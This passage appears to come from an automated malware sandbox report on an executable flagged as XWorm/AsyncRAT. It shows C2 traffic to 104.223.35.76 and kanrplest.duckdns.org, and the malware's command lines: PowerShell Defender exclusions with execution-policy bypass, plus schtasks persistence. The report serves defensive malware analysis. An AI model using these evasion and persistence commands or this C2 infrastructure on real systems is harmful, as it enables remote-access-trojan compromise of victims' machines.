                              Oct 31, 2024 10:33:52.299665928 CET500324068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:52.304984093 CET406850032104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:52.854731083 CET406850032104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:52.854868889 CET500324068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:57.440965891 CET500324068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:57.443573952 CET500334068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:57.445837021 CET406850032104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:57.448474884 CET406850033104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:57.448559999 CET500334068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:57.476763964 CET500334068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:57.481709003 CET406850033104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:57.486655951 CET500334068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:33:57.491719007 CET406850033104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:58.046257973 CET406850033104.223.35.76192.168.2.5
                              Oct 31, 2024 10:33:58.047878981 CET500334068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:02.690916061 CET500334068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:02.694991112 CET500344068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:02.695878983 CET406850033104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:02.700952053 CET406850034104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:02.701015949 CET500344068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:02.735022068 CET500344068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:02.740592003 CET406850034104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:03.296827078 CET406850034104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:03.296885967 CET500344068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:03.296988964 CET500344068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:03.302038908 CET406850034104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:03.310826063 CET500354068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:03.316152096 CET406850035104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:03.316232920 CET500354068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:03.356504917 CET500354068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:03.361454010 CET406850035104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:03.831753969 CET500354068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:03.836736917 CET406850035104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:03.908301115 CET406850035104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:03.908447981 CET500354068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:08.599159956 CET500354068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:08.602335930 CET500364068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:08.604016066 CET406850035104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:08.607232094 CET406850036104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:08.607335091 CET500364068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:08.631396055 CET500364068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:08.636291027 CET406850036104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:09.198349953 CET500364068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:09.203728914 CET406850036104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:09.216027975 CET406850036104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:09.216100931 CET500364068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:13.643981934 CET500364068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:13.645595074 CET500374068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:13.648953915 CET406850036104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:13.650450945 CET406850037104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:13.650548935 CET500374068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:13.738044024 CET500374068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:13.742933035 CET406850037104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:13.986479998 CET500374068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:13.991511106 CET406850037104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:14.241523027 CET406850037104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:14.241600990 CET500374068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:18.910022974 CET500374068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:18.914136887 CET500384068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:19.300350904 CET500374068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:19.753530025 CET406850037104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:19.753545046 CET406850038104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:19.753556013 CET406850037104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:19.753730059 CET500384068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:19.753735065 CET500374068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:19.852102995 CET500384068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:19.857070923 CET406850038104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:20.335119009 CET406850038104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:20.335241079 CET500384068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:24.878627062 CET500384068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:24.881057978 CET500394068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:24.883557081 CET406850038104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:24.885972977 CET406850039104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:24.886061907 CET500394068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:24.970992088 CET500394068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:24.975934029 CET406850039104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:25.484796047 CET406850039104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:25.485380888 CET500394068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:30.159851074 CET500394068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:30.163177967 CET500404068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:30.164940119 CET406850039104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:30.168133974 CET406850040104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:30.168204069 CET500404068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:30.197448969 CET500404068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:30.202296019 CET406850040104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:30.261044979 CET500404068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:30.266307116 CET406850040104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:30.756261110 CET406850040104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:30.756377935 CET500404068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:35.755913973 CET500404068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:35.759798050 CET500414068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:36.097088099 CET500404068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:36.780510902 CET406850040104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:36.780546904 CET406850041104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:36.780561924 CET406850040104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:36.780675888 CET500414068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:36.780678988 CET500404068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:36.915524960 CET500414068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:36.920545101 CET406850041104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:37.374737978 CET406850041104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:37.374983072 CET500414068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:42.034756899 CET500414068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:42.039876938 CET406850041104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:43.661561966 CET500424068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:43.666579008 CET406850042104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:43.666668892 CET500424068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:43.695864916 CET500424068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:43.702928066 CET406850042104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:43.802376986 CET500424068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:43.807869911 CET406850042104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:44.260122061 CET406850042104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:44.260189056 CET500424068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:48.940834999 CET500424068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:48.943566084 CET500434068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:48.945710897 CET406850042104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:48.948404074 CET406850043104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:48.948471069 CET500434068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:48.973530054 CET500434068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:48.978507042 CET406850043104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:48.997335911 CET500434068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:49.003106117 CET406850043104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:49.551551104 CET406850043104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:49.551656008 CET500434068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:54.066082001 CET500434068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:54.068067074 CET500444068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:54.071110010 CET406850043104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:54.072978020 CET406850044104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:54.073113918 CET500444068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:54.127953053 CET500444068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:54.133024931 CET406850044104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:54.134109974 CET500444068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:54.139267921 CET406850044104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:54.207954884 CET500444068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:54.212928057 CET406850044104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:54.473870039 CET500444068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:54.478979111 CET406850044104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:54.826952934 CET500444068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:54.832045078 CET406850044104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:56.655663013 CET500444068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:56.660799026 CET406850044104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:56.674664021 CET500444068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:56.680582047 CET406850044104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:56.729197979 CET500444068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:56.734318018 CET406850044104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:57.027791977 CET500444068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:57.032898903 CET406850044104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:57.075012922 CET500444068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:57.079924107 CET406850044104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:57.110064030 CET500444068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:57.115557909 CET406850044104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:57.115605116 CET500444068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:57.121422052 CET406850044104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:57.125989914 CET500444068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:57.131685972 CET406850044104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:57.142421007 CET500444068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:57.147192001 CET406850044104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:57.151961088 CET500444068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:57.157218933 CET406850044104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:57.159034014 CET500444068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:57.164145947 CET406850044104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:57.198723078 CET500444068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:57.203557014 CET406850044104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:58.746599913 CET500444068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:58.753093004 CET406850044104.223.35.76192.168.2.5
                              Oct 31, 2024 10:34:58.882929087 CET500444068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:34:58.891921997 CET406850044104.223.35.76192.168.2.5
                              Oct 31, 2024 10:35:01.102314949 CET500444068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:35:01.107609034 CET406850044104.223.35.76192.168.2.5
                              Oct 31, 2024 10:35:01.174329042 CET500444068192.168.2.5104.223.35.76
                              Oct 31, 2024 10:35:01.180030107 CET406850044104.223.35.76192.168.2.5

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Oct 31, 2024 10:31:26.820538998 CET5251453192.168.2.51.1.1.1
                              Oct 31, 2024 10:31:27.831769943 CET5251453192.168.2.51.1.1.1
                              Oct 31, 2024 10:31:28.848470926 CET5251453192.168.2.51.1.1.1
                              Oct 31, 2024 10:31:30.299156904 CET53525141.1.1.1192.168.2.5
                              Oct 31, 2024 10:31:30.299177885 CET53525141.1.1.1192.168.2.5
                              Oct 31, 2024 10:31:30.299190044 CET53525141.1.1.1192.168.2.5
                              Oct 31, 2024 10:32:30.035855055 CET5286053192.168.2.51.1.1.1
                              Oct 31, 2024 10:32:31.034739971 CET5286053192.168.2.51.1.1.1
                              Oct 31, 2024 10:32:32.050465107 CET5286053192.168.2.51.1.1.1
                              Oct 31, 2024 10:32:34.046374083 CET53528601.1.1.1192.168.2.5
                              Oct 31, 2024 10:32:34.046638966 CET53528601.1.1.1192.168.2.5
                              Oct 31, 2024 10:32:34.046649933 CET53528601.1.1.1192.168.2.5
                              Oct 31, 2024 10:32:35.161864996 CET5634353192.168.2.51.1.1.1
                              Oct 31, 2024 10:32:35.778625965 CET53563431.1.1.1192.168.2.5
                              Oct 31, 2024 10:33:36.100174904 CET5356653192.168.2.51.1.1.1
                              Oct 31, 2024 10:33:37.135565042 CET5356653192.168.2.51.1.1.1
                              Oct 31, 2024 10:33:38.131395102 CET5356653192.168.2.51.1.1.1
                              Oct 31, 2024 10:33:40.110851049 CET53535661.1.1.1192.168.2.5
                              Oct 31, 2024 10:33:40.110876083 CET53535661.1.1.1192.168.2.5
                              Oct 31, 2024 10:33:40.110886097 CET53535661.1.1.1192.168.2.5
                              Oct 31, 2024 10:33:40.941778898 CET5430753192.168.2.51.1.1.1
                              Oct 31, 2024 10:33:41.059111118 CET53543071.1.1.1192.168.2.5
                              Oct 31, 2024 10:34:42.042177916 CET6023453192.168.2.51.1.1.1
                              Oct 31, 2024 10:34:43.056642056 CET6023453192.168.2.51.1.1.1
                              Oct 31, 2024 10:34:43.660485029 CET53602341.1.1.1192.168.2.5
                              Oct 31, 2024 10:34:43.660502911 CET53602341.1.1.1192.168.2.5

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Oct 31, 2024 10:31:26.820538998 CET192.168.2.51.1.1.10x3e97Standard query (0)kanrplest.duckdns.orgA (IP address)IN (0x0001)false
                              Oct 31, 2024 10:31:27.831769943 CET192.168.2.51.1.1.10x3e97Standard query (0)kanrplest.duckdns.orgA (IP address)IN (0x0001)false
                              Oct 31, 2024 10:31:28.848470926 CET192.168.2.51.1.1.10x3e97Standard query (0)kanrplest.duckdns.orgA (IP address)IN (0x0001)false
                              Oct 31, 2024 10:32:30.035855055 CET192.168.2.51.1.1.10xb519Standard query (0)kanrplest.duckdns.orgA (IP address)IN (0x0001)false
                              Oct 31, 2024 10:32:31.034739971 CET192.168.2.51.1.1.10xb519Standard query (0)kanrplest.duckdns.orgA (IP address)IN (0x0001)false
                              Oct 31, 2024 10:32:32.050465107 CET192.168.2.51.1.1.10xb519Standard query (0)kanrplest.duckdns.orgA (IP address)IN (0x0001)false
                              Oct 31, 2024 10:32:35.161864996 CET192.168.2.51.1.1.10x5b83Standard query (0)kanrplest.duckdns.orgA (IP address)IN (0x0001)false
                              Oct 31, 2024 10:33:36.100174904 CET192.168.2.51.1.1.10xb726Standard query (0)kanrplest.duckdns.orgA (IP address)IN (0x0001)false
                              Oct 31, 2024 10:33:37.135565042 CET192.168.2.51.1.1.10xb726Standard query (0)kanrplest.duckdns.orgA (IP address)IN (0x0001)false
                              Oct 31, 2024 10:33:38.131395102 CET192.168.2.51.1.1.10xb726Standard query (0)kanrplest.duckdns.orgA (IP address)IN (0x0001)false
                              Oct 31, 2024 10:33:40.941778898 CET192.168.2.51.1.1.10x490dStandard query (0)kanrplest.duckdns.orgA (IP address)IN (0x0001)false
                              Oct 31, 2024 10:34:42.042177916 CET192.168.2.51.1.1.10xe7d3Standard query (0)kanrplest.duckdns.orgA (IP address)IN (0x0001)false
                              Oct 31, 2024 10:34:43.056642056 CET192.168.2.51.1.1.10xe7d3Standard query (0)kanrplest.duckdns.orgA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Oct 31, 2024 10:31:30.299156904 CET1.1.1.1192.168.2.50x3e97No error (0)kanrplest.duckdns.org104.223.35.76A (IP address)IN (0x0001)false
                              Oct 31, 2024 10:31:30.299177885 CET1.1.1.1192.168.2.50x3e97No error (0)kanrplest.duckdns.org104.223.35.76A (IP address)IN (0x0001)false
                              Oct 31, 2024 10:31:30.299190044 CET1.1.1.1192.168.2.50x3e97No error (0)kanrplest.duckdns.org104.223.35.76A (IP address)IN (0x0001)false
                              Oct 31, 2024 10:32:34.046374083 CET1.1.1.1192.168.2.50xb519Server failure (2)kanrplest.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                              Oct 31, 2024 10:32:34.046638966 CET1.1.1.1192.168.2.50xb519Server failure (2)kanrplest.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                              Oct 31, 2024 10:32:34.046649933 CET1.1.1.1192.168.2.50xb519Server failure (2)kanrplest.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                              Oct 31, 2024 10:32:35.778625965 CET1.1.1.1192.168.2.50x5b83No error (0)kanrplest.duckdns.org104.223.35.76A (IP address)IN (0x0001)false
                              Oct 31, 2024 10:33:40.110851049 CET1.1.1.1192.168.2.50xb726Server failure (2)kanrplest.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                              Oct 31, 2024 10:33:40.110876083 CET1.1.1.1192.168.2.50xb726Server failure (2)kanrplest.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                              Oct 31, 2024 10:33:40.110886097 CET1.1.1.1192.168.2.50xb726Server failure (2)kanrplest.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                              Oct 31, 2024 10:33:41.059111118 CET1.1.1.1192.168.2.50x490dNo error (0)kanrplest.duckdns.org104.223.35.76A (IP address)IN (0x0001)false
                              Oct 31, 2024 10:34:43.660485029 CET1.1.1.1192.168.2.50xe7d3No error (0)kanrplest.duckdns.org104.223.35.76A (IP address)IN (0x0001)false
                              Oct 31, 2024 10:34:43.660502911 CET1.1.1.1192.168.2.50xe7d3No error (0)kanrplest.duckdns.org104.223.35.76A (IP address)IN (0x0001)false

                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:05:30:59
                              Start date:31/10/2024
                              Path:C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"
                              Imagebase:0xd70000
                              File size:575'496 bytes
                              MD5 hash:FF9E45D7326698F34526793BF1244811
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2073252953.0000000003314000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2073252953.0000000003314000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:3
                              Start time:05:31:01
                              Start date:31/10/2024
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"
                              Imagebase:0x8e0000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:4
                              Start time:05:31:02
                              Start date:31/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6d64d0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:5
                              Start time:05:31:02
                              Start date:31/10/2024
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTUZKYTc.exe"
                              Imagebase:0x8e0000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:6
                              Start time:05:31:02
                              Start date:31/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6d64d0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:7
                              Start time:05:31:02
                              Start date:31/10/2024
                              Path:C:\Windows\SysWOW64\schtasks.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp960E.tmp"
                              Imagebase:0x5a0000
                              File size:187'904 bytes
                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:8
                              Start time:05:31:02
                              Start date:31/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6d64d0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:9
                              Start time:05:31:02
                              Start date:31/10/2024
                              Path:C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"
                              Imagebase:0xf80000
                              File size:575'496 bytes
                              MD5 hash:FF9E45D7326698F34526793BF1244811
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:false

                              General

                              Target ID:10
                              Start time:05:31:05
                              Start date:31/10/2024
                              Path:C:\Users\user\AppData\Roaming\RTUZKYTc.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\AppData\Roaming\RTUZKYTc.exe
                              Imagebase:0xa40000
                              File size:575'496 bytes
                              MD5 hash:FF9E45D7326698F34526793BF1244811
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000A.00000002.2150760883.00000000031E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000002.2150760883.00000000031E4000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000A.00000002.2150760883.0000000003182000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000002.2150760883.0000000003182000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                              Antivirus matches:
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 39%, ReversingLabs
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:12
                              Start time:05:31:06
                              Start date:31/10/2024
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe'
                              Imagebase:0x8e0000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:13
                              Start time:05:31:06
                              Start date:31/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6d64d0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:14
                              Start time:05:31:08
                              Start date:31/10/2024
                              Path:C:\Windows\SysWOW64\schtasks.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpAD5E.tmp"
                              Imagebase:0x5a0000
                              File size:187'904 bytes
                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:15
                              Start time:05:31:08
                              Start date:31/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6d64d0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:16
                              Start time:05:31:08
                              Start date:31/10/2024
                              Path:C:\Users\user\AppData\Roaming\RTUZKYTc.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\RTUZKYTc.exe"
                              Imagebase:0x880000
                              File size:575'496 bytes
                              MD5 hash:FF9E45D7326698F34526793BF1244811
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
